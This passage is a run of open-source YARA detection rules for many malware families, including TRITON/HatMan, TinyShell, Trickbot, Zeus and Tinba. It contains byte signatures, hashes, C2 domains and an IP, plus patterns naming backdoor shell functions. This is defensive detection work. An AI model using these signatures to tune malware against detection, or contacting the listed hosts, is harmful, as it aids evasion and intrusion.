74 65 20 66 6f 72 6d 61 74 20 33 00} condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule universal_1337_stealer_serveur : Stealer { meta: author="Kevin Falcoz" date="24/02/2013" description="Universal 1337 Stealer Serveur" strings: $signature1={2A 5B 53 2D 50 2D 4C 2D 49 2D 54 5D 2A} /*[S-P-L-I-T]*/ $signature2={2A 5B 48 2D 45 2D 52 2D 45 5D 2A} /*[H-E-R-E]*/ $signature3={46 54 50 7E} /*FTP~*/ $signature4={7E 31 7E 31 7E 30 7E 30} /*~1~1~0~0*/ condition: $signature1 and $signature2 or $signature3 and $signature4 } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" private rule RSharedStrings : Surtr Family { meta: description = "identifiers for remote and gmremote" author = "Katie Kleemola" last_updated = "07-21-2014" strings: $ = "nView_DiskLoydb" wide $ = "nView_KeyLoydb" wide $ = "nView_skins" wide $ = "UsbLoydb" wide $ = "%sBurn%s" wide $ = "soul" wide condition: any of them } private rule RemoteStrings : Remote Variant Surtr Family { meta: description = "indicators for remote.dll - surtr stage 2" author = "Katie Kleemola" last_updated = "07-21-2014" strings: $ = "\x00Remote.dll\x00" $ = "\x00CGm_PlugBase::" $ = "\x00ServiceMain\x00_K_H_K_UH\x00" $ = "\x00_Remote_\x00" wide condition: any of them } private rule GmRemoteStrings : GmRemote Variant Family Surtr { meta: description = "identifiers for gmremote: surtr stage 2" author = "Katie Kleemola" last_updated = "07-21-2014" strings: $ = "\x00x86_GmRemote.dll\x00" $ = "\x00D:\\Project\\GTProject\\Public\\List\\ListManager.cpp\x00" $ = "\x00GmShutPoint\x00" $ = "\x00GmRecvPoint\x00" $ = "\x00GmInitPoint\x00" $ = "\x00GmVerPoint\x00" $ = "\x00GmNumPoint\x00" $ = "_Gt_Remote_" wide $ = "%sBurn\\workdll.tmp" wide condition: any of them } rule GmRemote : Family Surtr Variant GmRemote { meta: description = "identifier for gmremote" author = "Katie Kleemola" last_updated = "07-25-2014" condition: RSharedStrings and GmRemoteStrings } rule Remote : Family Surtr Variant Remote { meta: description = "identifier for remote" author = "Katie Kleemola" last_updated = "07-25-2014" condition: RSharedStrings and RemoteStrings } rule SurtrStrings : Surtr Family { meta: author = "Katie Kleemola" description = "Strings for Surtr" last_updated = "2014-07-16" strings: $ = "\x00soul\x00" $ = "\x00InstallDll.dll\x00" $ = "\x00_One.dll\x00" $ = "_Fra.dll" $ = "CrtRunTime.log" $ = "Prod.t" $ = "Proe.t" $ = "Burn\\" $ = "LiveUpdata_Mem\\" condition: any of them } rule SurtrCode : Surtr Family { meta: author = "Katie Kleemola" description = "Code features for Surtr Stage1" last_updated = "2014-07-16" strings: //decrypt config $ = { 8A ?? ?? 84 ?? ?? 74 ?? 3C 01 74 ?? 34 01 88 41 3B ?? 72 ?? } //if Burn folder name is not in strings $ = { C6 [3] 42 C6 [3] 75 C6 [3] 72 C6 [3] 6E C6 [3] 5C } //mov char in _Fire $ = { C6 [3] 5F C6 [3] 46 C6 [3] 69 C6 [3] 72 C6 [3] 65 C6 [3] 2E C6 [3] 64 } condition: any of them } rule Surtr : Family { meta: author = "Katie Kleemola" description = "Rule for Surtr Stage One" last_updated = "2014-07-16" condition: SurtrStrings or SurtrCode } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule T5000Strings : T5000 Family { meta: description = "T5000 Identifying Strings" author = "Seth Hardy" last_modified = "2014-06-26" strings: $ = "_tmpR.vbs" $ = "_tmpg.vbs" $ = "Dtl.dat" wide ascii $ = "3C6FB3CA-69B1-454f-8B2F-BD157762810E" $ = "EED5CA6C-9958-4611-B7A7-1238F2E1B17E" $ = "8A8FF8AD-D1DE-4cef-B87C-82627677662E" $ = "43EE34A9-9063-4d2c-AACD-F5C62B849089" $ = "A8859547-C62D-4e8b-A82D-BE1479C684C9" $ = "A59CF429-D0DD-4207-88A1-04090680F714" $ = "utd_CE31" wide ascii $ = "f:\\Project\\T5000\\Src\\Target\\1 KjetDll.pdb" $ = "l:\\MyProject\\Vc 7.1\\T5000\\T5000Ver1.28\\Target\\4 CaptureDLL.pdb" $ = "f:\\Project\\T5000\\Src\\Target\\4 CaptureDLL.pdb" $ = "E:\\VS2010\\xPlat2\\Release\\InstRes32.pdb" condition: any of them } rule T5000 : Family { meta: description = "T5000" author = "Seth Hardy" last_modified = "2014-06-26" condition: T5000Strings } /* * DESCRIPTION: Yara rules to match the known binary components of the HatMan * malware targeting Triconex safety controllers. Any matching * components should hit using the "hatman" rule in addition to a * more specific "hatman_*" rule. * AUTHOR: DHS/NCCIC/ICS-CERT */ /* Private rules that are used at the end in the public rules. */ private rule hatman_setstatus : hatman { strings: $preset = { 80 00 40 3c 00 00 62 80 40 00 80 3c 40 20 03 7c ?? ?? 82 40 04 00 62 80 60 00 80 3c 40 20 03 7c ?? ?? 82 40 ?? ?? 42 38 } condition: $preset } private rule hatman_memcpy : hatman { strings: $memcpy_be = { 7c a9 03 a6 38 84 ff ff 38 63 ff ff 8c a4 00 01 9c a3 00 01 42 00 ff f8 4e 80 00 20 } $memcpy_le = { a6 03 a9 7c ff ff 84 38 ff ff 63 38 01 00 a4 8c 01 00 a3 9c f8 ff 00 42 20 00 80 4e } condition: $memcpy_be or $memcpy_le } private rule hatman_dividers : hatman { strings: $div1 = { 9a 78 56 00 } $div2 = { 34 12 00 00 } condition: $div1 and $div2 } private rule hatman_nullsub : hatman { strings: $nullsub = { ff ff 60 38 02 00 00 44 20 00 80 4e } condition: $nullsub } private rule hatman_origaddr : hatman { strings: $oaddr_be = { 3c 60 00 03 60 63 96 f4 4e 80 00 20 } $oaddr_le = { 03 00 60 3c f4 96 63 60 20 00 80 4e } condition: $oaddr_be or $oaddr_le } private rule hatman_origcode : hatman { strings: $ocode_be = { 3c 00 00 03 60 00 a0 b0 7c 09 03 a6 4e 80 04 20 } $ocode_le = { 03 00 00 3c b0 a0 00 60 a6 03 09 7c 20 04 80 4e } condition: $ocode_be or $ocode_le } private rule hatman_mftmsr : hatman { strings: $mfmsr_be = { 7c 63 00 a6 } $mfmsr_le = { a6 00 63 7c } $mtmsr_be = { 7c 63 01 24 } $mtmsr_le = { 24 01 63 7c } condition: ($mfmsr_be and $mtmsr_be) or ($mfmsr_le and $mtmsr_le) } private rule hatman_loadoff : hatman { strings: $loadoff_be = { 80 60 00 04 48 00 ?? ?? 70 60 ff ff 28 00 00 00 40 82 ?? ?? 28 03 00 00 41 82 ?? ?? } $loadoff_le = { 04 00 60 80 ?? ?? 00 48 ff ff 60 70 00 00 00 28 ?? ?? 82 40 00 00 03 28 ?? ?? 82 41 } condition: $loadoff_be or $loadoff_le } private rule hatman_injector_int : hatman { condition: hatman_memcpy and hatman_origaddr and hatman_loadoff } private rule hatman_payload_int : hatman { condition: hatman_memcpy and hatman_origcode and hatman_mftmsr } /* Actual public rules to match using the private rules. */ rule hatman_compiled_python : hatman { condition: filesize < 100KB and hatman_nullsub and hatman_setstatus and hatman_dividers } rule hatman_injector : hatman { condition: filesize < 100KB and hatman_injector_int and not hatman_payload_int } rule hatman_payload : hatman { condition: filesize < 100KB and hatman_payload_int and not hatman_injector_int } rule hatman_combined : hatman { condition: filesize < 100KB and hatman_injector_int and hatman_payload_int and hatman_dividers } rule hatman : hatman { meta: author = "DHS/NCCIC/ICS-CERT" description = "Matches the known samples of the HatMan malware." condition: filesize < 100KB and hatman_compiled_python or hatman_injector or hatman_payload or hatman_combined } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule TRITON_ICS_FRAMEWORK { meta: author = "nicholas.carr @itsreallynick" md5 = "0face841f7b2953e7c29c064d6886523" description = "TRITON framework recovered during Mandiant ICS incident response" strings: $python_compiled = ".pyc" nocase ascii wide $python_module_01 = "__module__" nocase ascii wide $python_module_02 = "<module>" nocase ascii wide $python_script_01 = "import Ts" nocase ascii wide $python_script_02 = "def ts_" nocase ascii wide $py_cnames_01 = "TS_cnames.py" nocase ascii wide $py_cnames_02 = "TRICON" nocase ascii wide $py_cnames_03 = "TriStation " nocase ascii wide $py_cnames_04 = " chassis " nocase ascii wide $py_tslibs_01 = "GetCpStatus" nocase ascii wide $py_tslibs_02 = "ts_" ascii wide $py_tslibs_03 = " sequence" nocase ascii wide $py_tslibs_04 = /import Ts(Hi|Low|Base)[^:alpha:]/ nocase ascii wide $py_tslibs_05 = /module\s?version/ nocase ascii wide $py_tslibs_06 = "bad " nocase ascii wide $py_tslibs_07 = "prog_cnt" nocase ascii wide $py_tsbase_01 = "TsBase.py" nocase ascii wide $py_tsbase_02 = ".TsBase(" nocase ascii wide $py_tshi_01 = "TsHi.py" nocase ascii wide $py_tshi_02 = "keystate" nocase ascii wide $py_tshi_03 = "GetProjectInfo" nocase ascii wide $py_tshi_04 = "GetProgramTable" nocase ascii wide $py_tshi_05 = "SafeAppendProgramMod" nocase ascii wide $py_tshi_06 = ".TsHi(" ascii nocase wide $py_tslow_01 = "TsLow.py" nocase ascii wide $py_tslow_02 = "print_last_error" ascii nocase wide $py_tslow_03 = ".TsLow(" ascii nocase wide $py_tslow_04 = "tcm_" ascii wide $py_tslow_05 = " TCM found" nocase ascii wide $py_crc_01 = "crc.pyc" nocase ascii wide $py_crc_02 = "CRC16_MODBUS" ascii wide $py_crc_03 = "Kotov Alaxander" nocase ascii wide $py_crc_04 = "CRC_CCITT_XMODEM" ascii wide $py_crc_05 = "crc16ret" ascii wide $py_crc_06 = "CRC16_CCITT_x1D0F" ascii wide $py_crc_07 = /CRC16_CCITT[^_]/ ascii wide $py_sh_01 = "sh.pyc" nocase ascii wide $py_keyword_01 = " FAILURE" ascii wide $py_keyword_02 = "symbol table" nocase ascii wide $py_TRIDENT_01 = "inject.bin" ascii nocase wide $py_TRIDENT_02 = "imain.bin" ascii nocase wide condition: 2 of ($python_*) and 7 of ($py_*) and filesize < 3MB } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Tedroo : Spammer { meta: author="Kevin Falcoz" date="22/11/2015" description="Tedroo Spammer" strings: $signature1={25 73 25 73 2E 65 78 65} $signature2={5F 6C 6F 67 2E 74 78 74} condition: $signature1 and $signature2 } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Tinba2 : banking { meta: author = "n3sfox <n3sfox@gmail.com>" date = "2015/11/07" description = "Tinba 2 (DGA) banking trojan" reference = "https://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world" filetype = "memory" hash1 = "c7f662594f07776ab047b322150f6ed0" hash2 = "dc71ef1e55f1ddb36b3c41b1b95ae586" hash3 = "b788155cb82a7600f2ed1965cffc1e88" strings: $str1 = "MapViewOfFile" $str2 = "OpenFileMapping" $str3 = "NtCreateUserProcess" $str4 = "NtQueryDirectoryFile" $str5 = "RtlCreateUserThread" $str6 = "DeleteUrlCacheEntry" $str7 = "PR_Read" $str8 = "PR_Write" $pubkey = "BEGIN PUBLIC KEY" $code1 = {50 87 44 24 04 6A ?? E8} condition: all of ($str*) and $pubkey and $code1 } /* Description: Detects ELF or MachO tinyshell backdoor on static, dynamic binary form. It is commonly used as backdoor in Linux, FreeBSD or MacOSX operating systems. This rule by default is NOT designed to scan the CNC client side. Category: ELF or MachO, backdoor, hacktool, RAT, shell License: This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) Version 1-20180211, author:unixfreaxjp */ private rule is__osx { meta: date = "2018-02-12" author = "@unixfreaxjp" condition: uint32(0) == 0xfeedface or uint32(0) == 0xcafebabe or uint32(0) == 0xbebafeca or uint32(0) == 0xcefaedfe or uint32(0) == 0xfeedfacf or uint32(0) == 0xcffaedfe } private rule priv01 { meta: date = "2018-02-11" author = "@unixfreaxjp" strings: $vara01 = { 73 3A 70 3A 00 } $vara02 = "Usage: %s" fullword nocase wide ascii $vara03 = "[ -s secret ]" fullword nocase wide ascii $vara04 = "[ -p port ]" fullword nocase wide ascii condition: all of them } private rule priv03 { meta: date = "2018-02-10" author = "@unixfreaxjp" strings: $varb01 = { 41 57 41 56 41 55 41 54 55 53 0F B6 06 } $varb02 = { 48 C7 07 00 00 00 00 48 C7 47 08 00 00 } $vard01 = { 55 48 89 E5 41 57 41 56 41 55 41 54 53 } $vard02 = { 55 48 89 E5 48 C7 47 08 00 00 00 00 48 } // can be added condition: (2 of ($varb*)) or (2 of ($vard*)) } private rule priv04 { meta: date = "2018-02-11" author = "@unixfreaxjp" strings: $varb03 = { 89 DF E8 FB A4 FF FF 83 C3 01 81 FB 00 04 } $vard03 = { 66 89 05 7D 5E 00 00 } // can be added condition: 1 of them } private rule priv02 { meta: date = "2018-02-10" author = "@unixfreaxjp" strings: $vare01 = "socket" fullword nocase wide ascii $vare02 = "connect" fullword nocase wide ascii $vare03 = "alarm" fullword nocase wide ascii $vare04 = "dup2" fullword nocase wide ascii $vare05 = "execl" fullword nocase wide ascii $vare06 = "openpty" fullword nocase wide ascii $vare07 = "putenv" fullword nocase wide ascii $vare08 = "setsid" fullword nocase wide ascii $vare09 = "ttyname" fullword nocase wide ascii $vare00 = "waitpid" fullword nocase wide ascii $varc01 = "HISTFIL" fullword nocase wide ascii $varc02 = "TERML" fullword nocase wide ascii $varc03 = "/bin/sh" fullword nocase wide ascii condition: (5 of ($vare*) or (2 of ($varc*))) } rule MALW_TinyShell_backconnect_OSX { meta: date = "2018-02-10" author = "@unixfreaxjp" condition: is__osx and priv01 and priv02 and priv03 and priv04 and filesize < 100KB } rule MALW_TinyShell_backconnect_ELF { meta: date = "2018-02-10" author = "@unixfreaxjp" condition: is__elf and priv01 and ((priv02) or ((priv03) or (priv04))) and filesize < 100KB } rule MALW_TinyShell_backconnect_Gen { meta: date = "2018-02-11" author = "@unixfreaxjp" condition: ((is__elf) or (is__osx)) and priv01 and priv02 and filesize < 100KB } rule MALW_TinyShell_backdoor_Gen { meta: date = "2018-02-11" author = "@unixfreaxjp" condition: ((is__elf) or (is__osx)) and priv01 and filesize > 20KB } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule ELF_Linux_Torte : Linux ELF { meta: author = "@mmorenog,@yararules" description = "Detects ELF Linux/Torte infection" ref = "http://blog.malwaremustdie.org/2016/01/mmd-0050-2016-incident-report-elf.html" hash1 = "1faf27f6b8e8a9cadb611f668a01cf73" hash2 = "cb0477445fef9c5f1a5b6689bbfb941e" strings: $s0 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6)" $s1 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)" $s2 = "?sessd=" $s3 = "&sessc=" $s4 = "&sessk=" $s5 = "3a08fe7b8c4da6ed09f21c3ef97efce2" $s6 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" $s7 = "_ZN11CThreadPool10getBatchesERSt6vectorISt4pairISsiESaIS2_EE" $s8 = "_ZNSs4_Rep10_M_destroyERKSaIcE@@GLIBCXX_3.4" $s9 = "_ZNSt6vectorImSaImEE13_M_insert_auxEN9__gnu_cxx17__normal_iteratorIPmS1_EERKm" $s10 = "_ZNSt6vectorISt4pairISsiESaIS1_EE13_M_insert_auxEN9__gnu_cxx17__normal_iteratorIPS1_S3_EERKS1_" $s11 = "_ZSt20__throw_out_of_rangePKc@@GLIBCXX_3.4" condition: is__elf and all of ($s*) } rule ELF_Linux_Torte_domains { meta: author = "@mmorenog,@yararules" description = "Detects ELF Linux/Torte infection" ref1 = "http://blog.malwaremustdie.org/2016/01/mmd-0050-2016-incident-report-elf.html" strings: $1 = "pages.touchpadz.com" ascii wide nocase $2 = "bat.touchpadz.com" ascii wide nocase $3 = "stat.touchpadz.com" ascii wide nocase $4 = "sk2.touchpadz.com" ascii wide nocase condition: any of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule TreasureHunt { meta: author = "Minerva Labs" ref ="http://www.minerva-labs.com/#!Cybercriminals-Adopt-the-Mossad-Emblem/c7a5/573da2d60cf2f90ca6f6e3ed" date = "2016/06" maltype = "Point of Sale (POS) Malware" filetype = "exe" strings: $a = "treasureHunter.pdb" $b = "jucheck" $c = "cmdLineDecrypted" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule MALW_trickbot_bankBot : Trojan { meta: author = "Marc Salinas @Bondey_m" description = "Detects Trickbot Banking Trojan" strings: $str_trick_01 = "moduleconfig" $str_trick_02 = "Start" $str_trick_03 = "Control" $str_trick_04 = "FreeBuffer" $str_trick_05 = "Release" condition: all of ($str_trick_*) } rule MALW_systeminfo_trickbot_module : Trojan { meta: author = "Marc Salinas @Bondey_m" description = "Detects systeminfo module from Trickbot Trojan" strings: $str_systeminf_01 = "<program>" $str_systeminf_02 = "<service>" $str_systeminf_03 = "</systeminfo>" $str_systeminf_04 = "GetSystemInfo.pdb" $str_systeminf_05 = "</autostart>" $str_systeminf_06 = "</moduleconfig>" condition: all of ($str_systeminf_*) } rule MALW_dllinject_trickbot_module : Trojan { meta: author = "Marc Salinas @Bondey_m" description = " Detects dllinject module from Trickbot Trojan" strings: $str_dllinj_01 = "user_pref(" $str_dllinj_02 = "<ignore_mask>" $str_dllinj_03 = "<require_header>" $str_dllinj_04 = "</dinj>" condition: all of ($str_dllinj_*) } rule MALW_mailsercher_trickbot_module : Trojan { meta: author = "Marc Salinas @Bondey_m" description = " Detects mailsearcher module from Trickbot Trojan" strings: $str_mails_01 = "mailsearcher" $str_mails_02 = "handler" $str_mails_03 = "conf" $str_mails_04 = "ctl" $str_mails_05 = "SetConf" $str_mails_06 = "file" $str_mails_07 = "needinfo" $str_mails_08 = "mailconf" condition: all of ($str_mails_*) } rule TrumpBot : MALW { meta: description = "TrumpBot" author = "Joan Soriano / @joanbtl" date = "2017-04-16" version = "1.0" MD5 = "77122e0e6fcf18df9572d80c4eedd88d" SHA1 = "108ee460d4c11ea373b7bba92086dd8023c0654f" strings: $string = "trumpisdaddy" $ip = "198.50.154.188" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Florian Roth Date: 2015-10-13 Identifier: Upatre Campaign October 2015 */ rule Upatre_Hazgurut { meta: description = "Detects Upatre malware - file hazgurut.exe" author = "Florian Roth" reference = "https://weankor.vxstream-sandbox.com/sample/6b857ef314938d37997c178ea50687a281d8ff9925f0c4e70940754643e2c0e3?environmentId=7" date = "2015-10-13" score = 70 hash1 = "7ee0d20b15e24b7fe72154d9521e1959752b4e9c20d2992500df9ac096450a50" hash2 = "79ffc620ddb143525fa32bc6a83c636168501a4a589a38cdb0a74afac1ee8b92" hash3 = "62d8a6880c594fe9529158b94a9336179fa7a3d3bf1aa9d0baaf07d03b281bd3" hash4 = "c64282aca980d558821bec8b3dfeae562d9620139dc43d02ee4d1745cd989f2a" hash5 = "a35f9870f9d4b993eb094460b05ee1f657199412807abe6264121dd7cc12aa70" hash6 = "f8cb2730ebc8fac1c58da1346ad1208585fe730c4f03d976eb1e13a1f5d81ef9" hash7 = "b65ad7e2d299d6955d95b7ae9b62233c34bc5f6aa9f87dc482914f8ad2cba5d2" hash8 = "6b857ef314938d37997c178ea50687a281d8ff9925f0c4e70940754643e2c0e3" hash9 = "33a288cef0ae7192b34bd2ef3f523dfb7c6cbc2735ba07edf988400df1713041" hash10 = "2a8e50afbc376cb2a9700d2d83c1be0c21ef942309676ecac897ba4646aba273" hash11 = "3d0f2c7e07b7d64b1bad049b804ff1aae8c1fc945a42ad555eca3e1698c7f7d3" hash12 = "951360b32a78173a1f81da0ded8b4400e230125d05970d41621830efc5337274" hash13 = "bd90faebfd7663ef89b120fe69809532cada3eb94bb94094e8bc615f70670295" hash14 = "8c5823f67f9625e4be39a67958f0f614ece49c18596eacc5620524bc9b6bad3d" strings: $a1 = "barcod" fullword ascii $s0 = "msports.dll" fullword ascii $s1 = "nddeapi.dll" fullword ascii $s2 = "glmf32.dll" fullword ascii $s3 = "<requestedExecutionLevel level=\"requireAdministrator\" uiAccess=\"false\">" fullword ascii $s4 = "cmutil.dll" fullword ascii $s5 = "mprapi.dll" fullword ascii $s6 = "glmf32.dll" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 1500KB and $a1 in (0..4000) and all of ($s*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule urausy_skype_dat : memory { meta: author = "AlienVault Labs" description = "Yara rule to match against memory of processes infected by Urausy skype.dat" strings: $a = "skype.dat" ascii wide $b = "skype.ini" ascii wide $win1 = "CreateWindow" $win2 = "YIWEFHIWQ" ascii wide $desk1 = "CreateDesktop" $desk2 = "MyDesktop" ascii wide condition: $a and $b and (all of ($win*) or all of ($desk*)) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule VidgrabCode : Vidgrab Family { meta: description = "Vidgrab code tricks" author = "Seth Hardy" last_modified = "2014-06-20" strings: $divbyzero = { B8 02 00 00 00 48 48 BA 02 00 00 00 83 F2 02 F7 F0 } // add eax, ecx; xor byte ptr [eax], ??h; inc ecx $xorloop = { 03 C1 80 30 (66 | 58) 41 } $junk = { 8B 4? ?? 8B 4? ?? 03 45 08 52 5A } condition: all of them } rule VidgrabStrings : Vidgrab Family { meta: description = "Vidgrab Identifying Strings" author = "Seth Hardy" last_modified = "2014-06-20" strings: $ = "IDI_ICON5" wide ascii $ = "starter.exe" $ = "wmifw.exe" $ = "Software\\rar" $ = "tmp092.tmp" $ = "temp1.exe" condition: 3 of them } rule Vidgrab : Family { meta: description = "Vidgrab" author = "Seth Hardy" last_modified = "2014-06-20" condition: VidgrabCode or VidgrabStrings } rule VirutFileInfector { meta: author = "D00RT <@D00RT_RM>" data = "2017/08/04" description = "Virut (unknown version) fileinfector detection" reference = "http://reversingminds-blog.logdown.com" infected_sample1 = "5755f09d445a5dcab3ea92d978c7c360" infected_sample2 = "68e508108ed94c8c391c70ef1d15e0f8" infected_sample2 = "2766e8e78ee10264cf1a3f5f4a16ff00" strings: $sign = { F9 E8 22 00 00 00 ?? 31 EB 56 } $func = { 52 C1 E9 1D 68 31 D4 00 00 58 5A 81 C1 94 01 00 00 80 4D 00 F0 89 6C 24 04 F7 D1 81 6C 24 04 } condition: $sign and $func } rule volgmer { meta: description = "Malformed User Agent" ref = "https://www.us-cert.gov/ncas/alerts/TA17-318B" strings: $s = "Mozillar/" condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and $s } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Wabot : Worm { meta: author="Kevin Falcoz" date="14/08/2015" description="Wabot Trojan Worm" strings: $signature1={43 3A 5C 6D 61 72 69 6A 75 61 6E 61 2E 74 78 74} $signature2={73 49 52 43 34} condition: $signature1 and $signature2 } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule WarpCode : Warp Family { meta: description = "Warp code features" author = "Seth Hardy" last_modified = "2014-07-10" strings: // character replacement $ = { 80 38 2B 75 03 C6 00 2D 80 38 2F 75 03 C6 00 5F } condition: any of them } rule WarpStrings : Warp Family { meta: description = "Warp Identifying Strings" author = "Seth Hardy" last_modified = "2014-07-10" strings: $ = "/2011/n325423.shtml?" $ = "wyle" $ = "\\~ISUN32.EXE" condition: any of them } rule Warp : Family { meta: description = "Warp" author = "Seth Hardy" last_modified = "2014-07-10" condition: WarpCode or WarpStrings } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule WimmieShellcode : Wimmie Family { meta: description = "Wimmie code features" author = "Seth Hardy" last_modified = "2014-07-17" strings: // decryption loop $ = { 49 30 24 39 83 F9 00 77 F7 8D 3D 4D 10 40 00 B9 0C 03 00 00 } $xordecrypt = {B9 B4 1D 00 00 [8] 49 30 24 39 83 F9 00 } condition: any of them } rule WimmieStrings : Wimmie Family { meta: description = "Strings used by Wimmie" author = "Seth Hardy" last_modified = "2014-07-17" strings: $ = "\x00ScriptMan" $ = "C:\\WINDOWS\\system32\\sysprep\\cryptbase.dll" wide ascii $ = "ProbeScriptFint" wide ascii $ = "ProbeScriptKids" condition: any of them } rule Wimmie : Family { meta: description = "Wimmie family" author = "Seth Hardy" last_modified = "2014-07-17" condition: WimmieShellcode or WimmieStrings } rule XHide: MALW { meta: description = "XHide - Process Faker" author = "Joan Soriano / @w0lfvan" date = "2017-12-01" version = "1.0" MD5 = "c644c04bce21dacdeb1e6c14c081e359" SHA256 = "59f5b21ef8a570c02453b5edb0e750a42a1382f6" strings: $a = "XHide - Process Faker" $b = "Fakename: %s PidNum: %d" condition: all of them } rule XMRIG_Miner { meta: ref = "https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e" strings: $a1 = "stratum+tcp" condition: $a1 } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule XOR_DDosv1 : DDoS { meta: author = "Akamai CSIRT" description = "Rule to detect XOR DDos infection" strings: $st0 = "BB2FA36AAA9541F0" $st1 = "md5=" $st2 = "denyip=" $st3 = "filename=" $st4 = "rmfile=" $st5 = "exec_packet" $st6 = "build_iphdr" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule YayihCode : Yayih Family { meta: description = "Yayih code features" author = "Seth Hardy" last_modified = "2014-07-11" strings: // encryption $ = { 80 04 08 7A 03 C1 8B 45 FC 80 34 08 19 03 C1 41 3B 0A 7C E9 } condition: any of them } rule YayihStrings : Yayih Family { meta: description = "Yayih Identifying Strings" author = "Seth Hardy" last_modified = "2014-07-11" strings: $ = "/bbs/info.asp" $ = "\\msinfo.exe" $ = "%s\\%srcs.pdf" $ = "\\aumLib.ini" condition: any of them } rule Yayih : Family { meta: description = "Yayih" author = "Seth Hardy" last_modified = "2014-07-11" condition: YayihCode or YayihStrings } rule yordanyan_activeagent { meta: description = "Memory string yara for Yordanyan ActiveAgent" author = "J from THL <j@techhelplist.com>" reference1 = "https://www.virustotal.com/#/file/a2e34bfd5a9789837bc2d580e87ec11b9f29c4a50296ef45b06e3895ff399746/detection" reference2 = "ETPRO TROJAN Win32.ActiveAgent CnC Create" date = "2018-10-04" maltype = "Botnet" filetype = "memory" strings: // the wide strings are 16bit bigendian strings in memory. strings -e b memdump.file $s01 = "I'm KeepRunner!" wide $s02 = "I'm Updater!" wide $s03 = "Starting Download..." wide $s04 = "Download Complete!" wide $s05 = "Running New Agent and terminating updater!" wide $s06 = "Can't Run downloaded file!" wide $s07 = "Retrying download and run!" wide $s08 = "Can't init Client." wide $s09 = "Client initialised -" wide $s10 = "Client not found!" wide $s11 = "Client signed." wide $s12 = "GetClientData" wide $s13 = "&counter=" wide $s14 = "&agent_file_version=" wide $s15 = "&agent_id=" wide $s16 = "mac_address=" wide $s17 = "Getting Attachments" wide $s18 = "public_name" wide $s19 = "Yor agent id =" wide $s20 = "Yor agent version =" wide $s21 = "Last agent version =" wide $s22 = "Agent is last version." wide $s23 = "Updating Agent" wide $s24 = "Terminating RunKeeper" wide $s25 = "Terminating RunKeeper: Done" wide $s26 = "ActiveAgent" ascii $s27 = "public_name" ascii condition: 15 of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule Zegost : Trojan { meta: author="Kevin Falcoz" date="10/06/2013" description="Zegost Trojan" strings: $signature1={39 2F 66 33 30 4C 69 35 75 62 4F 35 44 4E 41 44 44 78 47 38 73 37 36 32 74 71 59 3D} $signature2={00 BA DA 22 51 42 6F 6D 65 00} condition: $signature1 and $signature2 } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule Windows_Malware_Zeus : Zeus_1134 { meta: author = "Xylitol xylitol@malwareint.com" date = "2014-03-03" description = "Match first two bytes, protocol and string present in Zeus 1.1.3.4" reference = "http://www.xylibox.com/2014/03/zeus-1134.html" strings: $mz = {4D 5A} $protocol1 = "X_ID: " $protocol2 = "X_OS: " $protocol3 = "X_BV: " $stringR1 = "InitializeSecurityDescriptor" $stringR2 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)" condition: ($mz at 0 and all of ($protocol*) and ($stringR1 or $stringR2)) } rule Adwind { meta: author="Asaf Aprozper, asafa AT minerva-labs.com" description = "Adwind RAT" reference = "https://minerva-labs.com/post/adwind-and-other-evasive-java-rats" last_modified 